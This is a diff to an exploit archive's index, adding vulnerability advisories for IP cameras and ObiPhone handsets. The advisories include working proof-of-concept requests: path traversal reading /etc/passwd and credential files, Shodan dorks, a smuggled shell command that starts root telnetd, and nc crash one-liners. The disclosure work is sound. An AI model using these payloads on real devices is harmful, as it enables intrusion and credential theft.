Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 39257,platforms/php/webapps/39257.txt,"Tera Charts - (tera-charts) Plugin for WordPress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0 39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0 @@ -35516,7 +35516,7 @@ id,file,description,date,author,platform,type,port 39270,platforms/php/webapps/39270.txt,"WhyDoWork AdSense Plugin for WordPress options-general.php Option Manipulation CSRF",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 39272,platforms/php/webapps/39272.txt,"CMSimple Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0 -39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 +39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root (1)",2016-01-19,"Perception Point Team",linux,local,0 @@ -35543,7 +35543,7 @@ id,file,description,date,author,platform,type,port 39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 -39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 +39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 @@ -35591,12 +35591,12 @@ id,file,description,date,author,platform,type,port 39344,platforms/php/webapps/39344.txt,"ol-commerce /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39345,platforms/php/webapps/39345.txt,"ol-commerce /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39346,platforms/php/webapps/39346.txt,"ol-commerce /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39347,platforms/php/webapps/39347.txt,"Fonality trixbox /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39348,platforms/php/webapps/39348.txt,"Fonality trixbox /maint/modules/home/index.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39349,platforms/php/webapps/39349.txt,"Fonality trixbox /maint/modules/asterisk_info/asterisk_info.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39350,platforms/php/webapps/39350.txt,"Fonality trixbox /maint/modules/repo/repo.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39351,platforms/php/webapps/39351.txt,"Fonality trixbox /maint/modules/endpointcfg/endpointcfg.php lang Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39352,platforms/php/webapps/39352.txt,"Fonality trixbox /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39347,platforms/php/webapps/39347.txt,"Fonality trixbox - /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39348,platforms/php/webapps/39348.txt,"Fonality trixbox - /maint/modules/home/index.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39349,platforms/php/webapps/39349.txt,"Fonality trixbox - /maint/modules/asterisk_info/asterisk_info.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39350,platforms/php/webapps/39350.txt,"Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39351,platforms/php/webapps/39351.txt,"Fonality trixbox - /maint/modules/endpointcfg/endpointcfg.php lang Path Traversal Remote File Access",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 +39352,platforms/php/webapps/39352.txt,"Fonality trixbox - /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution",2014-07-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection Exploit",2016-01-28,bd0rk,php,webapps,80 39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80 39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80 @@ -35672,7 +35672,7 @@ id,file,description,date,author,platform,type,port 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0 39435,platforms/multiple/webapps/39435.txt,"Apache Sling Framework (Adobe AEM) 2.3.6 - Information Disclosure",2016-02-10,Vulnerability-Lab,multiple,webapps,0 39436,platforms/php/webapps/39436.txt,"Yeager CMS 1.2.1 - Multiple Vulnerabilities",2016-02-10,"SEC Consult",php,webapps,80 -39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L Authenticated Remote Command Execution",2016-02-10,Metasploit,hardware,remote,0 +39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution",2016-02-10,Metasploit,hardware,remote,0 39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0 39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0 39442,platforms/windows/local/39442.txt,"Windows Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0 @@ -35848,7 +35848,7 @@ id,file,description,date,author,platform,type,port 39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation Exploit",2016-03-28,"Google Security Research",linux,local,0 39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 -39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0 +39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege",2016-03-28,mr_me,windows,local,0 39631,platforms/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free Exploit",2016-03-29,"Google Security Research",multiple,remote,0 39632,platforms/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote,0 39633,platforms/multiple/dos/39633.txt,"Apple Quicktime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1",2016-03-30,"Francis Provencher",multiple,dos,0 @@ -35856,11 +35856,11 @@ id,file,description,date,author,platform,type,port 39635,platforms/multiple/dos/39635.txt,"Apple Quicktime < 7.7.79.80.95 - PSD File Parsing Memory Corruption",2016-03-30,"Francis Provencher",multiple,dos,0 39637,platforms/php/webapps/39637.txt,"CubeCart 6.0.10 - Multiple Vulnerabilities",2016-03-30,"High-Tech Bridge SA",php,webapps,80 39638,platforms/linux/dos/39638.txt,"Kamailio 4.3.4 - Heap-Based Buffer Overflow",2016-03-30,"Stelios Tsampas",linux,dos,0 -39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 Directory Traversal / Remote Code Execution",2016-03-30,Metasploit,php,remote,80 +39639,platforms/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution",2016-03-30,Metasploit,php,remote,80 39640,platforms/android/remote/39640.txt,"Metaphor - Stagefright Exploit with ASLR Bypass",2016-03-30,NorthBit,android,remote,0 39641,platforms/hardware/webapps/39641.html,"MOBOTIX Video Security Cameras - CSRF Add Admin Exploit",2016-03-31,LiquidWorm,hardware,webapps,80 39642,platforms/linux/webapps/39642.txt,"Apache OpenMeetings 1.9.x < 3.1.0 - ZIP File path Traversal",2016-03-31,"Andreas Lindh",linux,webapps,5080 -39643,platforms/java/remote/39643.rb,"Apache Jetspeed Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 +39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 @@ -35943,7 +35943,7 @@ id,file,description,date,author,platform,type,port 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC",2016-04-25,"David Silveiro",linux,dos,0 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0 -39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,Metasploit,windows,remote,80 +39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer - Arbitrary File Upload",2016-04-26,Metasploit,windows,remote,80 39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0 39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 @@ -36057,7 +36057,7 @@ id,file,description,date,author,platform,type,port 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,Metasploit,java,remote,8088 -39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,Metasploit,unix,remote,443 +39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS - Arbitrary File Upload",2016-05-25,Metasploit,unix,remote,443 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0 39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80 39856,platforms/php/webapps/39856.txt,"EduSec 4.2.5 - SQL Injection",2016-05-26,"Bikramaditya Guha",php,webapps,80 @@ -36119,7 +36119,7 @@ id,file,description,date,author,platform,type,port 39914,platforms/win_x86/shellcode/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39915,platforms/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos,0 39916,platforms/windows/local/39916.txt,"Riot Games League of Legends - Insecure File Permissions Privilege Escalation",2016-06-10,"Cyril Vallicari",windows,local,0 -39917,platforms/cgi/remote/39917.rb,"IPFire proxy.cgi RCE",2016-06-10,Metasploit,cgi,remote,444 +39917,platforms/cgi/remote/39917.rb,"IPFire - proxy.cgi RCE",2016-06-10,Metasploit,cgi,remote,444 39918,platforms/cgi/remote/39918.rb,"IPFire Bash Environment Variable Injection (Shellshock)",2016-06-10,Metasploit,cgi,remote,444 39919,platforms/multiple/remote/39919.rb,"Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution",2016-06-10,Metasploit,multiple,remote,8080 39920,platforms/osx/dos/39920.c,"OS X Kernel - Exploitable NULL Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0 @@ -36147,7 +36147,7 @@ id,file,description,date,author,platform,type,port 39942,platforms/linux/dos/39942.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read",2016-06-13,"Google Security Research",linux,dos,0 39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 -39945,platforms/linux/remote/39945.rb,"Apache Continuum Arbitrary Command Execution",2016-06-14,Metasploit,linux,remote,8080 +39945,platforms/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution",2016-06-14,Metasploit,linux,remote,8080 39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80 39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0 39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Stored XSS",2016-06-15,HaHwul,php,webapps,80 @@ -36382,6 +36382,7 @@ id,file,description,date,author,platform,type,port 40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0 40231,platforms/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,java,webapps,80 40232,platforms/linux/remote/40232.py,"FreePBX 13 / 14 - Remote Command Execution With Privilege Escalation",2016-08-12,pgt,linux,remote,0 +40281,platforms/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 @@ -36426,3 +36427,9 @@ id,file,description,date,author,platform,type,port 40276,platforms/hardware/webapps/40276.txt,"Fortigate Firewalls - Remote Code Execution (EGREGIOUSBLUNDER)",2016-08-19,"Shadow Brokers",hardware,webapps,0 40277,platforms/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",cgi,webapps,80 40278,platforms/php/webapps/40278.txt,"tcPbX - (tcpbx_lang) Local File Inclusion",2016-08-19,0x4148,php,webapps,0 +40282,platforms/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 +40283,platforms/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",cgi,webapps,0 +40284,platforms/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",hardware,webapps,0 +40286,platforms/java/webapps/40286.txt,"Sakai 10.7 - Multiple Vulnerabilities",2016-08-22,LiquidWorm,java,webapps,0 +40288,platforms/php/webapps/40288.txt,"WordPress 4.5.3 - Directory Traversal / Denial of Service",2016-08-22,"Yorick Koster",php,webapps,80 +40289,platforms/hardware/dos/40289.txt,"ObiHai ObiPhone 1032/1062 < 5-0-0-3497 - Multiple Vulnerabilities",2016-08-22,"David Tomaschik",hardware,dos,0 diff --git a/platforms/cgi/webapps/40281.txt b/platforms/cgi/webapps/40281.txt new file mode 100755 index 000000000..49c5ab048 --- /dev/null +++ b/platforms/cgi/webapps/40281.txt @@ -0,0 +1,41 @@ +1. Advisory Information +======================================== +Title : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Local File Inclusion +Vendor Homepage : https://is.spiap.com/ +Remotely Exploitable : Yes +Tested on Camera types : CCPW3025-IR , CVMW3025-IR +Product References : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html ++ : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html +Vulnerability : Local File Inclusion (Critical/High) +Shodan Dork : title:"Vanderbilt IP-Camera" +Date : 20/08/2016 +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman. + + +3. Description +======================================== +Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations. + + +4. Proof-of-Concept: +======================================== +For example you can get /etc/passwd +http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd +http://host:port/cgi-bin/chklogin.cgi?file=../../../etc/passwd + +Or config.ini file: + +http://host:port/cgi-bin/check.cgi?file=config.ini +http://host:port/cgi-bin/chklogin.cgi?file=config.ini + + + + +5. SOLUTION +======================================== +Contact the vendor for further information regarding the proper mitigation of this vulnerability. \ No newline at end of file diff --git a/platforms/cgi/webapps/40282.txt b/platforms/cgi/webapps/40282.txt new file mode 100755 index 000000000..36d240acf --- /dev/null +++ b/platforms/cgi/webapps/40282.txt @@ -0,0 +1,35 @@ +1. Advisory Information +======================================== +Title : JVC IP-Camera (VN-T216VPRU) Local File Inclusion +Vendor Homepage : http://pro.jvc.com/ +Remotely Exploitable : Yes +Tested on Camera types : VN-T216VPRU +Product References : http://pro.jvc.com/prof/attributes/features.jsp?model_id=MDL102145 +Vulnerability : Local File Inclusion (Critical/High) +Date : 20/08/2016 +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman. + + +3. Description +======================================== +JVC IP-Camera (VN-T216VPRU) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations. + + +4. Proof-of-Concept: +======================================== +For example you can get /etc/passwd +http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd + +Or config.ini file: + +http://host:port/cgi-bin/check.cgi?file=config.ini + + +5. SOLUTION +======================================== +Contact the vendor for further information regarding the proper mitigation of this vulnerability. \ No newline at end of file diff --git a/platforms/cgi/webapps/40283.txt b/platforms/cgi/webapps/40283.txt new file mode 100755 index 000000000..16432cd08 --- /dev/null +++ b/platforms/cgi/webapps/40283.txt @@ -0,0 +1,35 @@ +1. Advisory Information +======================================== +Title : Honeywell IP-Camera (HICC-1100PT) Local File Inclusion +Vendor Homepage : https://www.asia.security.honeywell.com +Remotely Exploitable : Yes +Tested on Camera types : HICC-1100PT +Reference : https://www.asia.security.honeywell.com/Pages/product.aspx?category=720P-1.3M%20Box%20Camera&cat=HSG-ASIASECURITY&pid=HICC-1100T +Vulnerability : Local File Inclusion (Critical/High) +Shodan Dork : html:"Honeywell IP-Camera" +Date : 20/08/2016 +Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test by Yakir Wizman. + + +3. Description +======================================== +Honeywell IP-Camera (HICC-1100PT) allows to unauthenticated user to include files from local server such as /etc/passwd, /etc/shadow or config.ini which contains all credentials and other configurations. + +4. Proof-of-Concept: +======================================== +For example you can get /etc/passwd +http://host:port/cgi-bin/check.cgi?file=../../../etc/passwd + +Or config.ini file: + +http://host:port/cgi-bin/check.cgi?file=config.ini + + +5. SOLUTION +======================================== +Contact the vendor for further information regarding the proper mitigation of this vulnerability. \ No newline at end of file diff --git a/platforms/hardware/dos/40289.txt b/platforms/hardware/dos/40289.txt new file mode 100755 index 000000000..5a8f49316 --- /dev/null +++ b/platforms/hardware/dos/40289.txt @@ -0,0 +1,268 @@ +ObiHai ObiPhone - Multiple Vulnerabilities +------------------------------------------ + +Introduction +============ +Multiple vulnerabilities were discovered in the web management +interface of the ObiHai ObiPhone products. The Vulnerabilities were +discovered during a black box security assessment and therefore the +vulnerability list should not be considered exhaustive. + +Affected Devices and Versions +============================= +ObiPhone 1032/1062 with firmware less than 5-0-0-3497. + +Vulnerability Overview +====================== +Obi-1. Memory corruption leading to free() of an attacker-controlled address +Obi-2. Command injection in WiFi Config +Obi-3. Denial of Service due to buffer overflow +Obi-4. Buffer overflow in internal socket handler +Obi-5. Cross-site request forgery +Obi-6. Failure to implement RFC 2617 correctly +Obi-7. Invalid pointer dereference due to invalid header +Obi-8. Null pointer dereference due to malicious URL +Obi-9. Denial of service due to invalid content-length + +Vulnerability Details +===================== + +---------------------------------------------------------------------------- +Obi-1. Memory corruption leading to free() of an attacker-controlled address +---------------------------------------------------------------------------- + +By providing a long URI (longer than 256 bytes) not containing a slash in a +request, a pointer is overwritten which is later passed to free(). By +controlling the location of the pointer, this would allow an attacker to affect +control flow and gain control of the application. Note that the free() seems to +occur during cleanup of the request, as a 404 is returned to the user before the +segmentation fault. + + python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80 + + (gdb) bt + #0 0x479d8b18 in free () from root/lib/libc.so.6 + #1 0x00135f20 in ?? () + (gdb) x/5i $pc + => 0x479d8b18 : ldr r3, [r0, #-4] + 0x479d8b1c : sub r5, r0, #8 + 0x479d8b20 : tst r3, #2 + 0x479d8b24 : bne 0x479d8bec + 0x479d8b28 : tst r3, #4 + (gdb) i r r0 + r0 0x41 65 + +--------------------------------------- +Obi-2. Command injection in WiFi Config +--------------------------------------- + +An authenticated user (including the lower-privileged "user" user) can enter a +hidden network name similar to "$(/usr/sbin/telnetd &)", which starts the telnet +daemon. + + GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1 + Host: foo + Authorization: [omitted] + +Note that telnetd is now running and accessible via user "root" with no +password. + +----------------------------------------------- +Obi-3. Denial of Service due to buffer overflow +----------------------------------------------- + +By providing a long URI (longer than 256 bytes) beginning with a slash, memory +is overwritten beyond the end of mapped memory, leading to a crash. Though no +exploitable behavior was observed, it is believed that memory containing +information relevant to the request or control flow is likely overwritten in the +process. strcpy() appears to write past the end of the stack for the current +thread, but it does not appear that there are saved link registers on the stack +for the devices under test. + + python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80 + + (gdb) bt + #0 0x479dc440 in strcpy () from root/lib/libc.so.6 + #1 0x001361c0 in ?? () + Backtrace stopped: previous frame identical to this frame (corrupt stack?) + (gdb) x/5i $pc + => 0x479dc440 : strb r3, [r1, r2] + 0x479dc444 : bne 0x479dc438 + 0x479dc448 : bx lr + 0x479dc44c : push {r4, r5, r6, lr} + 0x479dc450 : ldrb r3, [r0] + (gdb) i r r1 r2 + r1 0xb434df01 3023363841 + r2 0xff 255 + (gdb) p/x $r1+$r2 + $1 = 0xb434e000 + +------------------------------------------------- +Obi-4. Buffer overflow in internal socket handler +------------------------------------------------- + +Commands to be executed by realtime backend process `obid` are sent +via Unix domain sockets from obiapp. +In formatting the message for the Unix socket, a new string is constructed on +the stack. This string can overflow the static buffer, leading to control of +program flow. The only vectors leading to this code that were discovered during +the assessment were authenticated, however unauthenticated code paths may exist. +Note that the example command can be executed as the lower-privileged "user" +user. + + GET /wifi?checkssid=[A*1024] HTTP/1.1 + Host: foo + Authorization: [omitted] + + (gdb) + #0 0x41414140 in ?? () + #1 0x0006dc78 in ?? () + +--------------------------------- +Obi-5. Cross-site request forgery +--------------------------------- + +All portions of the web interface appear to lack any protection against +Cross-Site Request Forgery. Combined with the command injection vector in +ObiPhone-3, this would allow a remote attacker to execute arbitrary shell +commands on the phone, provided the current browser session was logged-in to the +phone. + +---------------------------------------------- +Obi-6. Failure to implement RFC 2617 correctly +---------------------------------------------- + +RFC 2617 specifies HTTP digest authentication, but is not correctly implemented +on the ObiPhone. The HTTP digest authentication fails to comply in the +following ways: + +- The URI is not validated +- The application does not verify that the nonce received is the one it sent +- The application does not verify that the nc value does not repeat or go + backwards + + GET / HTTP/1.1 + Host: foo + Authorization: Digest username="admin", realm="a", nonce="a", uri="/", + algorithm=MD5, response="309091eb609a937358a848ff817b231c", +opaque="", qop=auth, + nc=00000001, cnonce="a" + Connection: close + + HTTP/1.1 200 OK + Server: OBi110 + Cache-Control:must-revalidate, no-store, no-cache + Content-Type: text/html + Content-Length: 1108 + Connection: close + +Please note that the realm, nonce, cnonce, and nc values have all been chosen +and the response generated offline. + +-------------------------------------------------------- +Obi-7. Invalid pointer dereference due to invalid header +-------------------------------------------------------- + +Sending an invalid HTTP Authorization header, such as +"Authorization: foo", causes the program to attempt to read from an invalid +memory address, leading to a segmentation fault and reboot of the device. This +requires no authentication, only access to the network to which the device is +connected. + + GET / HTTP/1.1 + Host: foo + Authorization: foo + +This causes the server to dereference the address 0xFFFFFFFF, presumably +returned as a -1 error code. + + (gdb) bt + #0 0x479dc438 in strcpy () from root/lib/libc.so.6 + #1 0x00134ae0 in ?? () + (gdb) x/5i $pc + => 0x479dc438 : ldrb r3, [r1, #1]! + 0x479dc43c : cmp r3, #0 + 0x479dc440 : strb r3, [r1, r2] + 0x479dc444 : bne 0x479dc438 + 0x479dc448 : bx lr + (gdb) i r r1 + r1 0xffffffff 4294967295 + +---------------------------------------------------- +Obi-8. Null pointer dereference due to malicious URL +---------------------------------------------------- + +If the /obihai-xml handler is requested without any trailing slash or component, +this leads to a null pointer dereference, crash, and subsequent reboot of the +phone. This requires no authentication, only access to the network to which the +device is connected. + + GET /obihai-xml HTTP/1.1 + Host: foo + + (gdb) bt + #0 0x479dc7f4 in strlen () from root/lib/libc.so.6 + Backtrace stopped: Cannot access memory at address 0x8f6 + (gdb) info frame + Stack level 0, frame at 0xbef1aa50: + pc = 0x479dc7f4 in strlen; saved pc = 0x171830 + Outermost frame: Cannot access memory at address 0x8f6 + Arglist at 0xbef1aa50, args: + Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50 + (gdb) x/5i $pc + => 0x479dc7f4 : ldr r2, [r1], #4 + 0x479dc7f8 : ands r3, r0, #3 + 0x479dc7fc : rsb r0, r3, #0 + 0x479dc800 : beq 0x479dc818 + 0x479dc804 : orr r2, r2, #255 ; 0xff + (gdb) i r r1 + r1 0x0 0 + +------------------------------------------------------ +Obi-9. Denial of service due to invalid content-length +------------------------------------------------------ + +Content-Length headers of -1, -2, or -3 result in a crash and device reboot. +This does not appear exploitable to gain execution. Larger (more negative) +values return a page stating "Firmware Update Failed" though it does not appear +any attempt to update the firmware with the posted data occurred. + + POST / HTTP/1.1 + Host: foo + Content-Length: -1 + + Foo + +This appears to write a constant value of 0 to an address controlled by the +Content-Length parameter, but since it appears to be relative to a freshly +mapped page of memory (perhaps via mmap() or malloc()), it does not appear this +can be used to gain control of the application. + + (gdb) bt + #0 0x00138250 in HTTPD_msg_proc () + #1 0x00070138 in ?? () + (gdb) x/5i $pc + => 0x138250 : strb r1, [r3, r2] + 0x138254 : ldr r1, [r4, #24] + 0x138258 : ldr r0, [r4, #88] ; 0x58 + 0x13825c : bl 0x135a98 + 0x138260 : ldr r0, [r4, #88] ; 0x58 + (gdb) i r r3 r2 + r3 0xafcc7000 2949410816 + r2 0xffffffff 